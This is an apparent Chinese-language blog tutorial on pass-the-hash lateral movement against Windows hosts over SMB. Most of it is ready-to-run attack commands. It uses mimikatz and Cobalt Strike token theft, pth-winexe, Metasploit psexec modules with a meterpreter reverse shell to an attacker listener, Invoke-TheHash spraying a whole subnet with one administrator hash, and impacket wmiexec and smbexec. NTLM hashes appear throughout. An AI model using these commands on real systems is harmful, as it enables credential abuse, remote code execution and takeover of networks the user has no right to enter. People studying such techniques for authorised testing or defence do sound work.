PTH横向移动

PTH横向移动_第1张图片

0x01 简介

PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。

0x02 通过PTH横向移动

一、通过cobaltstrike进行PTH

1、在已上线机器中直接dir访问目标系统C盘,提示没权限。
beacon> shell dir \192.168.3.123\c$
PTH横向移动_第2张图片
2、此处使用先前已获取的hash对目标administrator用户进行PTH。(大致为通过mimikatz和目标hash创建一个访问令牌,此处PID为392)

beacon> mimikatz sekurlsa::pth /user:administrator /domain:ggyao /ntlm:b4e535a9bb56bcc084602062c9e2a9d4 /run:"cmd -w hidden"
(若为工作组环境,则命令修改为/domain:.)

PTH横向移动_第3张图片3、通过cobaltstrike内置的steal_token窃取刚刚创建的令牌,窃取成功后,可正常访问目标系统资源。

beacon> steal_token 392     
beacon> shell dir \\192.168.3.123\c$

PTH横向移动_第4张图片

二、通过kali自带工具进行pth

1、相关工具如下。
在这里插入图片描述
2、获取拿到权限机器的hash。
PTH横向移动_第5张图片
3、使用pth-winexe获取一个cmd。

pth-winexe -U GGYAO/administrator%dc4112fd3aee4d001578da9b8ff96ce3:b4e535a9bb56bcc084602062c9e2a9d4 --system --ostype=1 //192.168.3.123 cmd

PTH横向移动_第6张图片

三、MSF中hash传递模块的利用

psexec_command模块(特征明显,少用)
1、使用psexec_command模块进行命令执行。

msf > use auxiliary/admin/smb/psexec_command
msf > set rhosts 192.168.3.123
msf > set smbdomain GGYAO
msf > set smbuser administrator
msf > set smbpass 目标hash
msf > set command whoami
msf > set verbose true
msf > run

此处是用2003的hash成功pth了2008的机器,反之失败:
PTH横向移动_第7张图片

psexec_psh模块(特征明显,少用)

msf > use exploit/windows/smb/psexec_psh
msf > set rhost 192.168.3.123
msf > set smbdomain ggyao
msf > set smbuser administrator
msf > set smbpass 目标hash
msf > set payload windows/x64/meterpreter/reverse_tcp_uuid
msf > set lhost 192.168.3.86
msf > set lport 4444
msf > exploit -j -z

此处是用2003的hash成功pth了2008的机器,反之失败:
PTH横向移动_第8张图片

四、通过powershell进行批量pth(wmi)

使用已知管理员hash,批量撞指定网段机器,此方式同时适用于工作组和域环境。需要同时加载Invoke-WMIExec.ps1、Invoke-TheHash.ps1。(https://github.com/Kevin-Robertson/Invoke-TheHash)
1、加载脚本。

本地加载(推荐使用)
powershell -exec bypass
Import-Module .\Invoke-WMIExec.ps1
Import-Module .\Invoke-TheHash.ps1

PTH横向移动_第9张图片

2、利用已有管理员hash,批量撞指定网段机器。
域环境下:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain ggyao -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10
在这里插入图片描述

工作组环境下:
(或者在网段后加选项 -Domain .)
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4
在这里插入图片描述

五、通过impacket进行hash传递

命令执行
1、wmiexec.exe -hashes :e1c61709dffcf154ac9d77b5024f6d10 ggyao/[email protected] “ipconfig”
PTH横向移动_第10张图片

反弹shell
1、smbexec.exe -hashes :e1c61709dffcf154ac9d77b5024f6d10 ggyao/[email protected]
PTH横向移动_第11张图片

你可能感兴趣的:(内网渗透-横向移动)